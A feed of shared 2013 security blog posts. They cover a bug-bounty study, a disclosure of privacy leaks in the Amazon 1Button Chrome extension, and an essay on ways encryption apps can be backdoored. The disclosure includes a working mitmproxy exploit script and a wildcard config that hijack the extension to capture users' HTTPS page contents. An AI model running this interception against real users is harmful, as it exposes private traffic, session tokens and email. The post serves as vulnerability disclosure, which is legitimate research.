Shared posts

20 Jul 16:10

Video z SEConference 2013 #2: Dziesięć tysięcy pułapek: ZIP, RAR, etc.

Zgodnie z obietnicą wczoraj po południu wrzuciłem na YouTube nagranie video mojego wystąpienia pierwszego dnia na SEConference w Krakowie, podczas którego mówiłem o "internalsach" formatu ZIP (było też dość sporo dem).

Video: http://www.youtube.com/watch?v=BsFqI8BZ-U0
Slajdy: http://goo.gl/iU1aT

Jeśli chodzi o dzień drugi, to video/slajdy są podlinkowane w tym poście.

I tyle.
11 Jul 21:24

Study Confirms - Bug Bounties Provide Cost Effective Value

by Michael Coates
Bug bounties are all the rage today. Mozilla started the first major bounty program in 2004 for Firefox and later added critical websites in 2010, Chrome joined in 2010, Facebook in 2011 and even Microsoft has come around recently in June, 2013.


In addition to bounties offered directly through a specific company there are other programs like HP's ZDI and also a new on-demand approach to bug bounties for any company offered from BugCrowd

But, are bug bounties worth the time to manage, foster the research community, and the cost of the rewards? As someone who has been deeply involved in Mozilla's bounty program my answer has always been a resounding yes.

My opinion aside, I'm happy to now also draw attention to a Berkeley Study from Matthew Finifter, Devdatta Akhawe, and David Wagner titled An Empirical Study of Vulnerability Rewards Programs.

A few select quotes from the study:

On cost & value:

Both programs appear economically efficient, comparing favorably to thecost of hiring full-time security researchers. (pg 1)
 We find that VRPs appear to provide an economically efficient mechanism for finding vulnerabilities, with a reasonable cost/benefit trade-off (Sections 4.1.1 and 4.1.6). (pg 6)
 Benefits of a bug bounty program:
VRPs offer a number of potential attractions to software vendors. Offering adequate incentives entices security researchers to look for vulnerabilities, and this increased attention improves the likelihood of finding latent vulnerabilities.

Second, coordinating with security researchers allows vendors to more effectively manage vulnerability disclosures, reducing the likelihood of unexpected and costly zero-day disclosures. Monetary rewards provide an incentive for security researchers not to sell their research results to malicious actors in the underground economy or the gray world of vulnerability markets.

Third, VRPs may make it more difficult for black hats to find vulnerabilities to exploit. Patching vulnerabilities found through a VRP increases the difficulty and therefore cost for malicious actors to find zero-days because the pool of latent vulnerabilities has been diminished. Additionally, experience gained from VRPs (and exploit bounties [23,28]) can yield improvements to mitigation techniques and help identify other related vulnerabilities and sources of bugs.
Finally, VRPs often engender goodwill amongst the community of security researchers. Taken together, VRPs provide an attractive tool for increasing product security and protecting customer.  (pg 1)

Lastly, I presented on bug bounty programs for websites a few years back at OWASP AppSecUSA. My slides from that talk can be found on slideshare.
 



-Michael Coates - @_mwc
11 Jul 21:23

Jealous of PRISM? Use "Amazon 1 Button" Chrome extension to sniff all HTTPS websites!

by Krzysztof Kotowicz
tldr: Insecure browser addons may leak all your encrypted SSL traffic, exploits included

So, Snowden let the cat out of the bag. They're listening - the news are so big, that feds are no longer welcome at DEFCON. But let's all be honest - who doesn't like to snoop into other person's secrets? We all know how to set up rogue AP and use ettercap. Setting up your own wall of sheep is trivial. I think we can safely assume - plaintext traffic is dead easy to sniff and modify.

The real deal though is in the encrypted traffic. In browser's world that means all the juicy stuff is sent over HTTPS. Though intercepting HTTPS connections is possible, we can only do it via:
  • hacking the CA
  • social engineering (install the certificate) 
  • relying on click-through syndrome for SSL warnings
Too hard. Let's try some side channels. Let me show you how you can view all SSL encrypted data, via exploiting Amazon 1Button App installed on your victims' browsers.  

The extension info

Some short info about our hero of the day:

Amazon 1Button App Chrome extension
Version: 3.2013.627.0
Updated: June 28, 2013

1,791,011 users (scary, becase the extension needs the following permissions):

Amazon cares for your privacy...not

First, a little info about how it abuses your privacy, in case you use it already (tldr; uninstall NOW!). There's a few interesting things going on (all of them require no user interaction and are based on default settings):

It reports to Amazon every URL you visit, even HTTPS URLs.

GET /gp/bit/apps/web/SIA/scraper?url=https://gist.github.com/ HTTP/1.1
Host: www.amazon.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Referer: https://gist.github.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,pl;q=0.6
Cookie: lots-of-amazon-cookies
Unfortunately, this request goes over HTTPS, so only Amazon can know your URLs. You might want to look at Firefox version of the extension though (hint, hint).

It's against what they claim in their Privacy Policy:
The Amazon Browser Apps may also collect information about the websites you view, but that information is not associated with your Amazon account or identified with you. 
Well, request to https://www.amazon.com/gp/bit/apps/web/SIA/scraper?url=https://gist.github.com/ sends a lot of my Amazon cookies, doesn't it? But that's just a start.

Amazon XSS-es every website you visit

So called SIA feature of the extension is just that:
// main.js in extension code
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
    if (siaEnabled && changeInfo.status === 'complete') {
        Logger.log('Injecting SIA');
        storage.get('options.ubp_root', function(options_root) {
            var root = options_root['options.ubp_root']
            chrome.tabs.executeScript(null, { code: "(function() { var s = document.createElement('script'); s.src = \"" + root + "/gp/bit/apps/web/SIA/scraper?url=\" + document.location.href; document.body.appendChild(s);}());" });
        });
    }
});
So, it attaches external <script> on any website, and its code can be tailored to the exact URL of the page. To be fair, currently the script for all tested websites is just a harmless function.
 
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jul 2013 11:14:34 GMT
Content-Type: text/javascript; charset=UTF-8
...
 
(function(window,document){})(window,document);
So it's just like a ninja sent to every house that just awaits for further orders. /me doesn't like this anyway. Who knows what sites are modified, maybe it depends on your location, Amazon ID etc.

It reports contents of certain websites you visit to Alexa

Yes, not just URLs. For example, your Google searches over HTTPS, and a few first results are now known to Alexa as well.
POST http://widgets.alexa.com/traffic/rankr/?ref=https%3A%2F%2Fwww.google.pl%2Fsearch%3F...t%2526q%253Dhow%252Bto%252Boverthrow%252Ba%252Bgovernment... HTTP/1.1
Host: widgets.alexa.com
Proxy-Connection: keep-alive
Content-Length: 662
accept: application/xml
Origin: chrome-extension://pbjikboenpfhbbejgkoklgkhjpfogcam
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,pl;q=0.6
Cookie: aid=JRDTh1rpFM00ES

http://rense.com/general50/hwt.htm
http://en.wikipedia.org/wiki/Coup_d'%C3%A9tat
http://www.law.cornell.edu/uscode/text/18/2385
http://www.thefreedictionary.com/overthrow
http://io9.com/5574009/how-to-overthrow-the-government-tips-from-10-science-fiction-revolutionaries
http://williamblum.org/essays/read/overthrowing-other-peoples-governments-the-master-list
http://www.telegraph.co.uk/news/worldnews/northamerica/usa/9504380/US-soldiers-plotted-to-overthrow-government.html
http://ariannaonline.huffingtonpost.com/books/overthrow/
http://www.amazon.com/How-Overthrow-Government-Arianna-Huffington/dp/B000C4SYPC
http://codes.lp.findlaw.com/uscode/18/I/115/2385
Here's exemplary Google search and a view of what's sent over the proxy.
 
Notice that the URL and extracted page information travels over HTTP to http://widgets.alexa.com. So in man-in-the-middle attackers can access the information that extension is configured to send to Alexa.

Bottom line - Amazon is evil.

Amazon, did you just.... really?!

The real problem though is that attackers can actively exploit described extension features to hijack your information, e.g. get access to your HTTPS URLs and page contents. Extension dynamically configures itself by fetching information from Amazon. Namely, upon installation (and then periodically) it requests and processes two config files. Exemplary config is presented below:
// httpsdatalist.dat
[
  "https:[/]{2}(www[0-9]?|encrypted)[.](l.)?google[.].*[/]"
]
// search_conf.js
{
  "google" : {
    "urlexp" : "http(s)?:\\/\\/www\\.google\\..*\\/.*[?#&]q=([^&]+)",
    "rankometer" :  {
      "url"   :"http(s)?:\\/\\/(www(|[0-9])|encrypted)\\.(|l\\.)google\\..*\\/",
      "reload": true,
      "xpath" : {
        "block": [
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]",
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]",
          "//div/ol/li[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'g', ' ' ) ) ]"
        ],
        "insert" : [
          "./div/div/div/cite",
          "./div/div[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'kv', ' ' ) ) ]/cite",
          "./div/div/div/div[ contains( concat( ' ', normalize-space(@class), ' ' ),concat( ' ', 'kv', ' ' ) ) ]/cite"
        ],
        "target" : [
          "./div/h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href",
          "./h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href",
          "./div/h3[ contains( concat( ' ', normalize-space(@class), ' '), ' r ')]/descendant::a/@href"
        ]
      }
    },
    ...
  },
  ...
First file defines what HTTPS sites can be inspected. The second file defines URL patterns to watch for, and XPath expressions to extract content being reported back to Alexa. The files are fetched from these URLs:
Yes. The configuration for reporting extremely private data is sent over plaintext HTTP. WTF, Amazon?

Exploitation

Exploiting this is very simple:
  1. Set up/simulate a HTTP man-in-the-middle
  2. Listen for HTTP requests for above config files
  3. Respond with wildcard configuration (listen to all https:// sites & extract whole body)
  4. Log all subsequest HTTP requests to Alexa, gathering previously encrypted client webpages.
For demonstration purposes, I've made a mitmproxy script that converts Amazon 1Button Chrome extension to poor man's transparent HTTPS->HTTP proxy.
#!/usr/bin/env python

def start(sc):
    sc.log("Amazon One Click pwner started")

def response(sc, f):
    if f.request.path.startswith('/gp/bit/toolbar/3.0/toolbar/search_conf.js'):
        f.response.decode() # removes gzip header
        f.response.content = open('pwn.json','r').read()
    elif f.request.path.startswith('/gp/bit/toolbar/3.0/toolbar/httpsdatalist.dat'):
        f.response.decode() # removes gzip header
        f.response.content = '["https://"]' # log'em all


def request(sc, f):
    if f.request.path.startswith('/traffic/rankr/'):
        q = f.request.get_query()
        p = q.get_first('ref')
        if p and f.request.content:
            c = open('pwn.log', 'a')
            c.write(p + "\n" + f.request.get_decoded_content() + "\n============\n")
            c.close()

and complimetary pwn.json:

{
  "pwn" : {
    "urlexp" : "http(s)?:\\/\\/",
    "rankometer" :  {
      "url"   :"http(s)?:\\/\\/",
      "reload": true,
      "xpath" : {
        "block": [
          "//html"
        ],
        "insert" : [
          "//html"
        ],
        "target" : [
          "//html"
         ]
      }
    },
    "cba" : {
        "url"   :"http(s)?:\\/\\/",
        "reload": true
    }
  }
}
To start the attack, simply route all HTTP (port 80) traffic to mitmproxy and launch the script:
$ mitmproxy -s pwn.py
Now install the extension in your Chrome (or disable and enable it to quickly reload configuration) and start browsing. All captured HTTPS data will be in pwn.log file.



Exploit source: GitHub

Limitations

  • We are limited to XPath expressions to retrieve content, so I can't return the usual HTML source, nor can I access headers etc. The closest I got is string value of //html node, which is somewhat the content of all text nodes on a page
  • AJAX applications snooping works poorly, as the extension does not report XMLHttpRequest responses
  • We are only passively listening, no option to modify traffic 
Nevertheless, there's plenty of private info in captured traffic. CSRF tokens, session ids, email contents, Google Drive document content, you name it. Thank you, Amazon, for protecting my privacy. But seriously - move all your extension traffic to HTTPS only. Better yet, remove the tracking code altogether.

I've done other research on Google Chrome extension security, read more if you found the topic interesting.

Update: One day after the publication, Amazon did not stop tracking, but fixed the vulnerability - the config links are now served over HTTPS. Once again, full disclosure helped the common folks' security.
22 Jun 10:28

How to 'backdoor' an encryption app

by Matthew Green
Over the past week or so there's been a huge burst of interest in encryption software. Applications like Silent Circle and RedPhone have seen a major uptick in new installs. CryptoCat alone has seen a zillion new installs, prompting several infosec researchers to nearly die of irritation.

From my perspective this is a fantastic glass of lemonade, if one made from particular bitter lemons. It seems all we ever needed to get encryption into the mainstream was... ubiquitous NSA surveillance. Who knew?

Since I've written about encryption software before on this blog, I received several calls this week from reporters who want to know what these apps do. Sooner or later each interview runs into the same question: what happens when somebody plans a crime using one of these? Shouldn't law enforcement have some way to listen in?

This is not a theoretical matter. The FBI has been floating a very real proposal that will either mandate wiretap backdoors in these systems, or alternatively will impose fines on providers that fail to cough up user data. This legislation goes by the name 'CALEA II', after the CALEA act which governs traditional (POTS) phone wiretapping.

Personally I'm strongly against these measures, particularly the ones that target client software. Mandating wiretap capability jeopardizes users' legitimate privacy needs and will seriously hinder technical progress in this area. Such 'backdoors' may be compromised by the very same criminals we're trying to stop. Moreover, smart/serious criminals will easily bypass them.

To me, a more interesting question is how such 'backdoors' would even work. This isn't something you can really discuss in an interview, which is why I decided to blog about them. The answers range from 'dead stupid' to 'diabolically technical', with the best answers sitting somewhere in the middle. Even if many of these are pretty obvious from a technical perspective, we can't really have a debate until they've all been spelled out.

And so: in the rest of this post I'm going to discuss five of the most likely ways to add backdoors to end-to-end encryption systems.
1. Don't use end-to-end encryption in the first place (just say you do.)
There's no need to kick down the door when you already have the keys. Similarly there's no reason to add a 'backdoor' when you already have the plaintext. Unfortunately this is the case for a shocking number of popular chat systems -- ranging from Google Talk (er, 'Hangouts') to your typical commercial Voice-over-IP system. The same statement also applies to at least some components of more robust systems: for example, Skype text messages.

Many of these systems use encryption at some level, but typically only to protect communications from the end user to the company's servers. Once there, the data is available to capture or log to your heart's content.
2. Own the directory service (or be the Certificate Authority).
Fortunately an increasing number of applications really do encrypt voice and text messages end-to-end -- meaning that the data is encrypted all the way from sender directly to the recipient. This cuts the service out of the equation (mostly), which is nice. But unfortunately it's only half the story.

The problem here is that encrypting things is generally the easy bit. The hard part is distributing the keys (key signing parties anyone?) Many 'end-to-end' systems -- notably Skype*, Apple's iMessage and Wickr -- try to make your life easier by providing a convenient 'key lookup service', or else by acting as trusted certificate authorities to sign your keys. Some will even store your secret keys.**

This certainly does make life easier, both for you and the company, should it decide to eavesdrop on you. Since the service controls the key, it can just as easily send you its own public key -- or a public key belonging to the FBI. This approach makes it ridiculously easy for providers to run a Man-in-the-Middle attack (MITM) and intercept any data they want.

This is always 'best' way to distinguish seirous encryption systems from their lesser cousins. When a company tells you they're encrypting end-to-end, just ask them: how are you distributing keys? If they can't answer -- or worse, they blabber about 'military grade encryption' -- you might want to find another service.
3. Metadata is the new data.
The best encryption systems push key distribution offline, or even better, perform a true end-to-end key exchange that only involves the parties to the communication. The latter applies to several protocols -- notably OTR and ZRTP -- used by apps like Silent Circle, RedPhone and CryptoCat.

You still have to worry about the possibility that an attacker might substitute her own key material in the connection (an MITM attack). So the best of these systems add a verification phase in which the parties check a key fingerprint -- preferably in person, but possibly by reading it over a voice connection (you know what your friends' voice sounds like, don't you?) Some programs will even convert the fingerprint into a short 'authentication string' that you can read to your friend.


From a cryptographic perspective the design of these systems is quite good. But you don't need to attack the software to get useful information out of them. That's because while encryption may hide what you say, it doesn't necessarily hide who you're talking to.

The problem here is that someone needs to move your (encrypted) data from point A to point B. Typically this work is done by a server operated by the company that wrote the app. While the server may not be able to eavesdrop you, it can easily log the details (including IP addresses) of each call. This is essentially the same data the NSA collects from phone carriers.

Particularly when it comes to VoIP (where anonymity services like Tor just aren't very effective), this is a big problem. Some companies are out ahead of it: Silent Circle (a company whose founders have threatened chew off their own limbs rather than comply with surveillance orders) don't log any IP addresses. One hopes the other services are as careful.

But even this isn't perfect: just because you choose not to collect doesn't mean you can't. If the government shows up with a National Security Letter compelling your compliance -- or just hacks your servers -- that information will obtained.
4. Escrow your keys.
If you want to add real eavesdropping backdoors to a properly-designed encryption protocol you have to take things to a whole different level. Generally this requires that you modify the encryption software itself.

If you're doing this above board you'd refer to it as 'key escrow'. A simple technique is just to an extra field to the wire protocol. Each time your clients agree on a session key, you have one of the parties encrypt that key under the public key of a third party (say, the encryption service, or a law enforcement agency). The encrypted key gets shipped along with the rest of the handshake data. PGP used to provide this as an optional feature, and the US government unsuccessfully tried to mandate an escrow-capable system called Clipper.***

In theory key escrow features don't weaken the system. In practice this is debatable. The security of every connection now depends on the security of your master 'escrow' secret key. And experience tells us that wiretapping systems are surprisingly vulnerable. In 2009, for example, a group of Chinese hackers were able to breach the servers used to manage Google's law enforcement surveillance infrastructure -- giving them access to confidential data on every target the US government was surveilling.

One hopes that law enforcement escrow keys would be better secured. But they probably won't be.
5. Compromise, Update, Exflitrate. 
But what if your software doesn't have escrow functionality? Then it's time to change the software.

The simplest way to add an eavesdropping function is just to issue a software update. Ship a trustworthy client, ask your users to enable automatic updates, then deliver a new version when you need to. This gets even easier now that some operating systems are adding automatic background app updates.

If updates aren't an option, there are always software vulnerabilities. If you're the one developing the software you have some extra capabilities here. All you need to do is keep track of a few minor vulnerabilities in your server-client communication protocol -- which may be secured by SSL and thus protected from third party exploits. These can be weaknesses as minor as an uninitialized memory structure or a 'wild read' that can be used to scan key material.

Or better yet, put your vulnerabilities in at the level of the crypto implementation itself. It's terrifyingly easy to break crypto code -- for example, the difference between a working random number generator and a badly broken one can be a single line of code, or even a couple of instructions. Re-use some counters in your AES implementation, or (better yet) implement ECDSA without a proper random nonce. You can even exflitrate your keys using a subliminal channel.

Or just write a simple exploit like the normal kids do.

Unfortunately there's very little we can do about things like this. Probably the best defense is to use open source code, disable software updates until others have reviewed them, and then pray you're never the target of a National Security Letter. Because if you are -- none of this crap is going to save you.

Conclusion

I hope nobody comes away with the wrong idea about any of this. I wouldn't seriously recommend that anyone add backdoors to a piece of encryption software. In fact, this is just about the worst idea in the world.

That said, encryption software is likely to be a victim of its own success. Either we'll stay in the technical ghetto, with only a few boring nerds adopting the technology. Or the world will catch on. And then the pressure will come. At that point the authors of these applications are going to face some tough choices. I don't envy them one bit.

Notes:

* See this wildly out of date security analysis (still available on Skype's site) for a description of how this system worked circa 2005.

** A few systems (notably Hushmail back in the 90s) will store your secret keys encrypted under a password. This shouldn't inspire a lot of confidence, since passwords are notoriously easy to crack. Moreover, if the system has a 'password recovery' service (such as Apple's iForgot) you can more or less guarantee that even this kind of encryption isn't happening.

*** The story of Clipper (and how it failed) is a wonderful one. Go read Matt Blaze's paper.
08 Jun 09:23

Daily strip 06. Jun 2013

29 Apr 07:22

Rodzinka pe el

by remo29@NOSPAM.gazeta.pl